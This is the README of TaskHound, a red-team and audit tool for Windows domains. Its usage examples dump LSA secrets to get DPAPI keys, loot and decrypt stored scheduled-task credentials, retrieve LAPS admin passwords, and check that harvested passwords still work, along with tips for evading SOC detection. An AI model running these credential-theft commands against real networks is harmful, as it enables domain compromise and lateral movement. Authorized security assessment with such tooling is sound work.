Windows Privileged Scheduled Task Discovery Tool for fun and profit.
TaskHound hunts for Windows scheduled tasks that run with privileged accounts and stored credentials. It enumerates tasks over SMB, parses XMLs, and identifies high-value attack opportunities through BloodHound integration.
For backstory/lore and detailed explanations: see the associated Blog Posts - Part 1 and Part 2.
| Feature | Description |
|---|---|
| Tier 0 & High Value Detection | Automatically identifies tasks running as Domain Admins, Enterprise Admins, and other privileged accounts |
| BloodHound Integration | Connect to live BHCE/Legacy instances or ingest exports for high-value user detection |
| OpenGraph Support | Visualize scheduled tasks as attack path nodes in BloodHound CE |
| LAPS Integration | Auto-retrieve and use LAPS passwords (both Windows LAPS and Legacy) for per-host authentication |
| DPAPI Credential Extraction | Collect and decrypt DPAPI blobs containing stored task credentials |
| Multi-threaded Scanning | Parallel target processing with rate limiting for large environments |
| LDAP-based Tier-0 Detection | Detect privileged accounts via group membership without BloodHound |
| Credential Validation | Verify if stored task passwords are still valid via RPC |
| Offline Analysis | Process mounted disk images or previously collected XMLs |
| Multiple Output Formats | Plain text, JSON, CSV, and HTML security reports with severity scoring |
| SID Resolution | Multi-tier resolution via BloodHound → Cache → LSARPC → LDAP → GC |
| Caching | SQLite-based persistent cache for SID lookups and LAPS credentials |
# Install
git clone https://github.com/1r0BIT/TaskHound.git
cd TaskHound
python3 -m venv .venv && source .venv/bin/activate
pip install -r requirements.txt && pip install .
# Basic usage - single target
taskhound -u homer.simpson -p 'Doh!123' -d thesimpsons.local -t moe.thesimpsons.local
# Multiple targets with threading
taskhound -u homer.simpson -p 'Doh!123' -d thesimpsons.local --targets-file hosts.txt --threads 10
# Auto-discover all domain computers
taskhound -u homer.simpson -p 'Doh!123' -d thesimpsons.local --dc-ip 10.0.0.1 --auto-targets --threads 20
# With LAPS - auto-retrieves per-host local admin passwords
taskhound -u homer.simpson -p 'Doh!123' -d thesimpsons.local --targets-file hosts.txt --laps --threads 10
# Offline analysis of mounted disk image
taskhound --offline-disk /mnt/diskAuth Support: TaskHound supports most major authentication mechanisms including password, NTLM hash, Kerberos (also with ccache), and AES key authentication.
TaskHound supports TOML configuration files for persistent settings. Create taskhound.toml in your working directory or ~/.config/taskhound/:
[authentication]
username = "svc_taskhound"
domain = "THESIMPSONS.LOCAL"
[target]
dc_ip = "10.0.0.1"
threads = 10
timeout = 30
[bloodhound]
live = true
connector = "http://127.0.0.1:8080"
api_key = "${BH_API_KEY}" # Use env vars for secrets
api_key_id = "${BH_API_KEY_ID}"
type = "bhce"
[bloodhound.opengraph]
enabled = true
output_dir = "./opengraph"
[laps]
enabled = true
[cache]
enabled = true
ttl = 86400 # 24 hoursPriority: CLI args > Environment variables > Local config > User config > Defaults
TaskHound's BOF is included in the Adaptix Extension-Kit under SAR-BOF/taskhound/.
TTTTT AAA SSS K K H H OOO U U N N DDDD
T A A S K K H H O O U U NN N D D
T AAAAA SSS KKK HHHHH O O U U N N N D D
T A A S K K H H O O U U N NN D D
T A A SSSS K K H H OOO UUU N N DDDD
by 0xr0BIT
[+] Connecting to BloodHound CE at http://127.0.0.1:8080
[+] BloodHound connection successful (API v2)
[+] High Value target data loaded (42 users)
[+] OpenGraph generation enabled (auto-upload active)
[*] Processing target: moe.thesimpsons.local
[+] moe.thesimpsons.local: Connected via SMB
[+] moe.thesimpsons.local: Local Admin Access confirmed
[*] moe.thesimpsons.local: Enumerating scheduled tasks (skipping \Microsoft)
[+] moe.thesimpsons.local: Found 12 tasks (3 privileged, 2 with stored credentials)
┌──────────────────────────────────────────────────────────────────────────────┐
│ [TIER-0] moe.thesimpsons.local - \DuffBrewery\BackupJob │
├──────────────────────────────────────────────────────────────────────────────┤
│ Enabled │ True │
│ RunAs │ THESIMPSONS\Administrator │
│ What │ C:\Scripts\backup_beer_recipes.ps1 │
│ Author │ THESIMPSONS\burns.monty │
│ Date │ 2025-06-15T02:30:00 │
│ Trigger │ Calendar (starts 2025-06-15 02:30, daily) │
│ Reason │ Tier 0 - Domain Admins membership │
│ Cred Validation │ VALID │
│ Pwd Analysis │ Password changed BEFORE task creation - credentials valid │
└──────────────────────────────────────────────────────────────────────────────┘
┌──────────────────────────────────────────────────────────────────────────────┐
│ [PRIV] moe.thesimpsons.local - \KrustyBurger\InventorySync │
├──────────────────────────────────────────────────────────────────────────────┤
│ Enabled │ True │
│ RunAs │ THESIMPSONS\svc_krusty │
│ What │ C:\KrustyApps\sync.exe --silent │
│ Author │ THESIMPSONS\carlson.carl │
│ Date │ 2025-03-10T08:00:00 │
│ Trigger │ Calendar (starts 2025-03-10 08:00, every 4 hours) │
│ Reason │ High Value match found in BloodHound │
│ Cred Validation │ LIKELY INVALID (password older than pwdLastSet) │
│ Pwd Analysis │ Password changed AFTER task - credentials may be stale │
└──────────────────────────────────────────────────────────────────────────────┘
╭─────────────────────────── SCAN COMPLETE ────────────────────────────────────╮
│ [+] Succeeded: 1 │
│ [-] Failed: 0 │
│ Total time: 2.34s │
│ Avg per target: 2340ms │
╰──────────────────────────────────────────────────────────────────────────────╯
╭─────────────────────────── TASK SUMMARY ─────────────────────────────────────╮
│ Hostname Tier-0 Privileged Normal │
│ moe.thesimpsons.local 1 2 9 │
╰──────────────────────────────────────────────────────────────────────────────╯
╭─────────────────────── BLOODHOUND OPENGRAPH ─────────────────────────────────╮
│ [+] Generated 3 nodes, 5 edges │
│ [+] Uploaded to BloodHound successfully │
│ [*] JSON saved to: ./opengraph/taskhound_data.json │
╰──────────────────────────────────────────────────────────────────────────────╯
TaskHound supports both Legacy BloodHound (Neo4j) and BloodHound Community Edition (BHCE) with automatic format detection.
# BHCE with API Key (recommended)
taskhound -u homer.simpson -p 'Doh!123' -d thesimpsons.local -t moe.thesimpsons.local \
--bh-live --bhce --bh-connector http://127.0.0.1:8080 \
--bh-api-key "YOUR_API_KEY" --bh-api-key-id "YOUR_KEY_ID"
# BHCE with username/password
taskhound -u homer.simpson -p 'Doh!123' -d thesimpsons.local -t moe.thesimpsons.local \
--bh-live --bhce --bh-connector http://127.0.0.1:8080 \
--bh-user admin --bh-password password
# Legacy BloodHound (Neo4j)
taskhound -u homer.simpson -p 'Doh!123' -d thesimpsons.local -t moe.thesimpsons.local \
--bh-live --legacy --bh-connector bolt://127.0.0.1:7687 \
--bh-user neo4j --bh-password password| Source | Detection Method |
|---|---|
| BHCE | isTierZero, system tags (admin_tier_0), AdminSDHolder |
| Legacy | AdminSDHolder (admincount=1), SID-based detection |
| LDAP | Group membership queries (--ldap-tier0) |
| Built-in | Well-known Tier 0 SIDs (Domain Admins, Enterprise Admins, etc.) |
If live connection isn't possible, export high-value users with these Cypher queries:
BHCE:
MATCH (n) WHERE coalesce(n.system_tags, "") CONTAINS "admin_tier_0" OR n.highvalue = true
MATCH p = (n)-[:MemberOf*1..]->(g:Group)
RETURN p;Legacy:
MATCH (u:User {highvalue:true})
OPTIONAL MATCH (u)-[:MemberOf*1..]->(g:Group)
WITH u, properties(u) as all_props, collect(g.name) as groups
RETURN u.samaccountname AS SamAccountName, all_props, groupsThen use: taskhound --bh-data exported_users.json ...
TaskHound creates custom nodes and edges in BloodHound CE to visualize scheduled task attack paths.
What You Get:
- Custom Nodes:
ScheduledTaskwith 20+ properties (credentials, triggers, password analysis, validation status) - Custom Edges:
HasTask,HasTaskWithStoredCreds,RunsAs - Attack Paths:
(Owned) → AdminTo → (Computer) → HasTask → (Task) → RunsAs → (Target)
# Collect and auto-upload
taskhound -u homer.simpson -p 'Doh!123' -d thesimpsons.local -t moe.thesimpsons.local --bh-opengraph
# Generate without upload (saves to {output_dir}/opengraph/)
taskhound -u homer.simpson -p 'Doh!123' -d thesimpsons.local -t moe.thesimpsons.local --bh-opengraph --bh-no-uploadNote: OpenGraph is BHCE-only. Legacy BloodHound doesn't support custom node types.
TaskHound can automatically retrieve and use LAPS passwords for per-host authentication. Supports both Windows LAPS (msLAPS-Password) and Legacy LAPS (ms-Mcs-AdmPwd), including encrypted passwords via MS-GKDI.
# Basic LAPS - auto-retrieves passwords per target
taskhound -u homer.simpson -p 'Doh!123' -d thesimpsons.local --targets-file hosts.txt --laps --threads 10
# Custom local admin username
taskhound -u homer.simpson -p 'Doh!123' -d thesimpsons.local -t moe.thesimpsons.local --laps --laps-user localadmin
# LAPS with OPSEC mode (other noisy operations disabled)
taskhound -u homer.simpson -p 'Doh!123' -d thesimpsons.local -t moe.thesimpsons.local --laps --opsec --force-lapsSupported LAPS Types:
| Type | Attribute | Encrypted |
|---|---|---|
| Windows LAPS | msLAPS-Password |
No |
| Windows LAPS | msLAPS-EncryptedPassword |
Yes (MS-GKDI) |
| Legacy LAPS | ms-Mcs-AdmPwd |
No |
TaskHound extracts and decrypts stored task credentials using DPAPI. DPAPI looting is enabled by default.
# Step 1: Get DPAPI_SYSTEM key via LSA dump
nxc smb moe.thesimpsons.local -u homer.simpson -p 'Doh!123' --lsa
# Look for: DPAPI_SYSTEM userkey: 0x51e43225...
# Step 2a: Loot + decrypt immediately (looting is default, just add key)
taskhound -t moe.thesimpsons.local -u homer.simpson -p 'Doh!123' -d thesimpsons.local --dpapi-key 0x51e43225...
# Step 2b: Or collect now (default saves to ./output/raw_backups/), decrypt later
taskhound -t moe.thesimpsons.local -u homer.simpson -p 'Doh!123' -d thesimpsons.local
# Later:
taskhound --offline ./output/raw_backups/moe.thesimpsons.local --dpapi-key 0x51e43225...
# Custom output directory
taskhound -t moe.thesimpsons.local -u homer.simpson -p 'Doh!123' -d thesimpsons.local --output-dir ./collected
# Disable DPAPI looting explicitly
taskhound -t moe.thesimpsons.local -u homer.simpson -p 'Doh!123' -d thesimpsons.local --no-lootImportant: Each host has a unique DPAPI_SYSTEM key. For multi-target scans, collect (default), then decrypt each target offline.
TaskHound verifies if stored task passwords are still valid by querying task execution history via RPC. This is enabled by default.
# Credential validation is on by default, no flag needed
taskhound -u homer.simpson -p 'Doh!123' -d thesimpsons.local -t moe.thesimpsons.local
# Disable validation explicitly
taskhound -u homer.simpson -p 'Doh!123' -d thesimpsons.local -t moe.thesimpsons.local --no-validate-credsOutput includes validation status:
VALID- Credentials confirmed working, task can executeVALID (restricted)- Password correct but account restricted (e.g., no batch or interactive logon right)INVALID (wrong password)- Logon failure (0x8007052E)BLOCKED (account disabled/expired)- Account disabled, locked, or password expiredUNKNOWN- Task never ran, cannot determineLIKELY VALID/INVALID- Heuristic based on password freshness when task never ran
Note: Disabled when using
--opsecor--no-rpc.
TaskHound supports multiple output formats for different use cases. All outputs use a structured directory layout under --output-dir (default: ./output).
| Format | Flag | Description | Use Case |
|---|---|---|---|
| Plain | -o plain |
Human-readable console output (default) | Interactive use, quick review |
| JSON | -o json |
Machine-readable structured export | Automation, data analysis, scripting |
| CSV | -o csv |
Spreadsheet-compatible export | Reporting, filtering, Excel analysis |
| HTML | -o html |
Security report with severity scoring | Blue team audits, stakeholder reports |
# Default - plain text to console + files
taskhound -u homer.simpson -p 'Doh!123' -d thesimpsons.local -t moe.thesimpsons.local
# Multiple output formats
taskhound -u homer.simpson -p 'Doh!123' -d thesimpsons.local --auto-targets -o plain,json,html
# JSON only for automation
taskhound -u homer.simpson -p 'Doh!123' -d thesimpsons.local --auto-targets -o json
# Custom output directory
taskhound -u homer.simpson -p 'Doh!123' -d thesimpsons.local --auto-targets -o html --output-dir ./audit_results
# All formats for comprehensive audit
taskhound -u homer.simpson -p 'Doh!123' -d thesimpsons.local --auto-targets -o plain,json,csv,html --output-dir ./full_audit./output/ # Base directory (--output-dir)
├── plain/ # Plain text output
│ └── <hostname>/
│ └── tasks.txt
├── json/ # JSON export
│ └── taskhound.json
├── csv/ # CSV export
│ └── taskhound.csv
├── html/ # HTML security reports
│ └── taskhound.html
├── opengraph/ # BloodHound OpenGraph files
│ └── taskhound_data.json
└── raw_backups/ # Raw collection (XML + DPAPI)
└── <hostname>/
├── tasks/ # Task XML files
└── dpapi_loot/ # DPAPI credential blobs
The HTML output generates a comprehensive security report designed for blue team assessments:
- Severity Scoring: Tasks rated by risk level based on privilege, stored credentials, and configuration
- Task Details: Full metadata including triggers, actions, run-as accounts, and validation status
- Filtering: Client-side filtering by host, severity, and credential status
- Export Ready: Suitable for management reports and audit documentation
By default, TaskHound saves raw XML task files and DPAPI credential blobs for offline analysis:
# Disable backup collection
taskhound -u homer.simpson -p 'Doh!123' -d thesimpsons.local -t moe.thesimpsons.local --no-backup
# Analyze backups later (offline mode)
taskhound --offline ./output/raw_backups/moe.thesimpsons.local --dpapi-key 0x51e43225...For large environments, use parallel scanning with rate limiting:
# 20 parallel workers, max 5 targets/second
taskhound -u homer.simpson -p 'Doh!123' -d thesimpsons.local --auto-targets --threads 20 --rate-limit 5
# Auto-discover servers only (uses preset filter)
taskhound -u homer.simpson -p 'Doh!123' -d thesimpsons.local --auto-targets --ldap-filter servers --threads 20
# Include disabled computers and extend stale threshold to 90 days
taskhound -u homer.simpson -p 'Doh!123' -d thesimpsons.local --auto-targets --include-disabled --stale-threshold 90
# Target workstations only, disable stale filtering
taskhound -u homer.simpson -p 'Doh!123' -d thesimpsons.local --auto-targets --ldap-filter workstations --stale-threshold 0By default, --auto-targets applies smart filtering to reduce noise and failed connections:
| Filter | Default | Override |
|---|---|---|
| Disabled accounts | Excluded | --include-disabled |
| Stale computers (>60 days) | Excluded | --stale-threshold 0 (disable) |
| Domain Controllers | Excluded | --include-dcs |
Data Source Priority: BloodHound (if configured) → LDAP fallback
When using BloodHound, TaskHound queries with include_properties=true for efficient single-query enumeration. If BloodHound data is older than 7 days, a warning is displayed; over 30 days triggers an urgent warning.
Filter Presets:
servers- Windows Server operating systems onlyworkstations- Non-server operating systems only(raw LDAP)- Custom LDAP filter (requires LDAP source)
TaskHound resolves SIDs to readable names using a multi-tier fallback chain:
- BloodHound (if connected) - fastest, no network traffic
- Cache - SQLite persistent cache (default 24h TTL)
- LSARPC - direct target query (most accurate for local accounts)
- LDAP - domain controller query
- Global Catalog - for cross-domain/forest SIDs
# Separate LDAP credentials for SID resolution
taskhound -u localadmin -p 'L0c4lP@ss!' -d . -t moe.thesimpsons.local \
--ldap-user homer.simpson --ldap-password 'Doh!123' --ldap-domain thesimpsons.local
# Specify Global Catalog for multi-domain
taskhound -u homer.simpson -p 'Doh!123' -d thesimpsons.local -t moe.thesimpsons.local --gc-server 10.0.0.1
# Disable all network-based resolution (OPSEC)
taskhound -u homer.simpson -p 'Doh!123' -d thesimpsons.local -t moe.thesimpsons.local --opsecAnalyze tasks without network access:
# Previously collected XML backups
taskhound --offline ./backup/moe.thesimpsons.local
# Mounted disk image
taskhound --offline-disk /mnt/disk
# Mounted image with custom hostname
taskhound --offline-disk /mnt/disk --disk-hostname MOETaskHound provides granular control over network operations to balance stealth vs functionality.
| Protocol | Operations | Flag to Disable |
|---|---|---|
| SMB | Task enumeration (always used) | N/A |
| LDAP (389/636) | SID resolution, Tier-0 detection, pwdLastSet | --no-ldap |
| Global Catalog (3268) | Cross-domain SID resolution | --no-ldap |
| LSARPC (SMB pipe) | Fallback SID resolution | --no-rpc |
| Remote Registry (SMB pipe) | Credential Guard detection | --no-credguard |
| Task Scheduler RPC (SMB pipe) | Credential validation | --no-validate-creds |
| DPAPI file collection (SMB) | DPAPI credential blob collection | --no-loot |
Default: BloodHound → Cache → LSARPC → LDAP → GC
--no-ldap: BloodHound → Cache → LSARPC
--no-rpc: BloodHound → Cache → LDAP → GC
--opsec: BloodHound → Cache (only)
TaskHound is very noisy by default - all features are enabled for maximum visibility. This makes it ideal for audits and comprehensive assessments where OPSEC is not a concern:
- Credential Guard detection - Enabled by default (disable with
--no-credguard) - Credential validation - Enabled by default (disable with
--no-validate-creds) - DPAPI looting - Enabled by default (disable with
--no-loot) - LDAP resolution - Enabled by default (disable with
--no-ldap) - RPC operations - Enabled by default (disable with
--no-rpc)
Warning
Credential Guard checks are HIGHLY detectable. Since the Remote Registry service is stopped by default on modern Windows, TaskHound will remotely start the service via SCM, perform the checks, then stop it (Just like secretsdump). This will make any decent SOC light up like a Christmas tree. Definitely use --no-credguard if you want to avoid this in engagements!
Speaking of Engagements: For red team/stealth operations, use --opsec to disable all noisy features at once. (Or use the BOF).
# Full OPSEC mode (disables: LDAP, RPC, looting, credguard, validation)
taskhound -u user -p 'pass' -d corp.local -t target --opsec
# Disable LDAP only (keep LSARPC for SID resolution)
taskhound -u user -p 'pass' -d corp.local -t target --no-ldap
# Disable RPC only (keep LDAP for SID resolution)
taskhound -u user -p 'pass' -d corp.local -t target --no-rpc
# LAPS with OPSEC (force LAPS LDAP queries despite --opsec)
taskhound -u user -p 'pass' -d corp.local --laps --opsec --force-laps- Pre-populate BloodHound data - Import domain data first with
--bh-live - Use
--opsecflag - Disables all noisy operations at once - Collect XMLs via other means - Analyze offline with
--offline - Use the BOF implementation - Available in AdaptixC2
TaskHound uses Rich for formatted console output with colored tables and progress indicators.
taskhound --help
Click to expand full usage
Usage: taskhound [OPTIONS] [TARGETS]
AUTHENTICATION OPTIONS
-u, --username Username (required for online mode)
-p, --password Password (omit with -k for Kerberos/ccache)
-d, --domain Domain (required for online mode)
--hashes NTLM hashes (LM:NT or NT-only)
-k, --kerberos Use Kerberos authentication
--aes-key AES key for Kerberos (32 or 64 hex chars)
TARGET OPTIONS
-t, --target Single target or comma-separated list
--targets-file File with targets, one per line
--dc-ip Domain controller IP
--ns, --nameserver DNS nameserver for lookups
--timeout Connection timeout in seconds (default: 5)
--threads Parallel worker threads (default: 1)
--rate-limit Max targets per second (default: unlimited)
--dns-tcp Force DNS over TCP (for SOCKS proxies)
--auto-targets Auto-discover targets (BloodHound first, LDAP fallback)
--ldap-filter Filter for auto-targets: 'servers', 'workstations', or raw LDAP
--include-dcs Include Domain Controllers in auto-targets
--include-disabled Include disabled computer accounts
--stale-threshold Exclude computers inactive >N days (default: 60, 0=disable)
SCANNING OPTIONS
--offline Parse XMLs from directory
--offline-disk Analyze mounted Windows filesystem
--disk-hostname Override hostname for offline-disk
--bh-data BloodHound export file for HV detection
--opsec Stealth mode: --no-ldap --no-rpc --no-loot --no-credguard --no-validate-creds
--no-rpc Disable RPC operations (LSARPC, CredGuard, validation)
--include-ms Include \Microsoft tasks
--include-local Include local system accounts
--include-all Include ALL tasks
--unsaved-creds Show tasks without stored credentials
--no-credguard Disable Credential Guard detection (default: enabled)
--no-validate-creds Disable credential validation (default: enabled)
BLOODHOUND OPTIONS
--bh-live Enable live BloodHound connection
--bh-connector BloodHound URI (default: http://127.0.0.1:8080)
--bh-user BloodHound username
--bh-password BloodHound password
--bh-api-key BloodHound API key
--bh-api-key-id BloodHound API key ID
--bh-timeout API query timeout (default: 120)
--bhce Use BHCE (Community Edition)
--legacy Use Legacy BloodHound (Neo4j)
--bh-save Save query results to file
OPENGRAPH OPTIONS (BHCE ONLY)
--bh-opengraph Generate OpenGraph JSON files (saves to {output_dir}/opengraph/)
--bh-no-upload Skip automatic upload
--bh-force-icon Force icon update
--bh-icon Icon name (default: clock)
--bh-color Icon color (default: #8B5CF6)
--bh-allow-orphans Create edges for missing nodes
DPAPI OPTIONS
--no-loot Disable DPAPI credential collection (default: enabled)
--dpapi-key DPAPI_SYSTEM userkey (hex format)
LDAP/SID RESOLUTION
--no-ldap Disable LDAP/GC operations
--ldap-user Alternative LDAP username
--ldap-password Alternative LDAP password
--ldap-hashes Alternative LDAP hashes
--ldap-domain Alternative LDAP domain
--ldap-tier0 Enable LDAP-based Tier-0 detection
--gc-server Global Catalog server IP
LAPS OPTIONS
--laps Enable LAPS authentication
--laps-user Override local admin username
--force-laps Force LAPS in OPSEC mode
CACHE OPTIONS
--cache-ttl Cache TTL in seconds (default: 86400)
--no-cache Disable caching
--clear-cache Clear cache before run
--cache-file Cache file path
OUTPUT OPTIONS
-o, --output Output formats (comma-separated: plain,json,csv,html)
Default: plain
--output-dir Base output directory (default: ./output)
--no-backup Disable raw XML backup collection
--no-summary Disable summary table
Output directory structure:
./output/
├── plain/<host>/tasks.txt # Plain text output
├── json/taskhound.json # JSON export
├── csv/taskhound.csv # CSV export
├── html/taskhound.html # HTML security report
├── opengraph/ # BloodHound OpenGraph files
└── raw_backups/<host>/ # Raw XML + DPAPI files
├── tasks/ # Task XML files
└── dpapi_loot/ # DPAPI credential blobs
MISC
--verbose Verbose output
--debug Debug output with stack traces
When caffeine intake and free time align:
API Key Authentication - HMAC-SHA256 signed requestsLAPS Support - Windows LAPS + Legacy + encrypted via MS-GKDIMulti-threaded Processing - Parallel scanning with rate limitingCredential Validation - RPC-based password validity checkingMultiple Output Formats - Plain, JSON, CSV, HTML with structured directory layoutAuto-target Discovery - LDAP-based computer enumerationOffline Disk Mode - Mounted disk image analysisPersistent Caching - SQLite cache for SID/LAPS dataRich Console Output - Colored tables and progress indicatorsCross-Domain Support - Multi-domain environments with trust relationships
- Modularization of Stages: This turned into a behemoth with way too many switches. I'll fix that.
- Abuse Info Integration: MITRE ATT&CK techniques in BloodHound nodes
- Custom Tier-0 Mappings: Support for User-defined privilege zones in BHCE
- Linux Checks: Support to scan *nix based operating systems
- Fortra/Impacket - SMB/RPC/Kerberos, DPAPI-NG, MS-GKDI
- SpecterOps/BloodHound - Attack path analysis
- Podalirius/bh-opengraph - OpenGraph inspiration
- Pennyw0rth/NetExec - LAPS implementation reference
- jborean93/dpapi-ng - DPAPI-NG research
- tijldeneut/DPAPIck3 - DPAPI decryption reference
- gentilkiwi/mimikatz - DPAPI research
And everyone who contributed to making offensive security tooling accessible.
TaskHound is strictly an audit and educational tool. Use only in environments you own or have explicit authorization to test. Seriously. Don't be a jerk.
PRs welcome. Half of this was caffeine-induced vibe-coding, so don't expect miracles.
Use responsibly. No warranty provided. See LICENSE for details.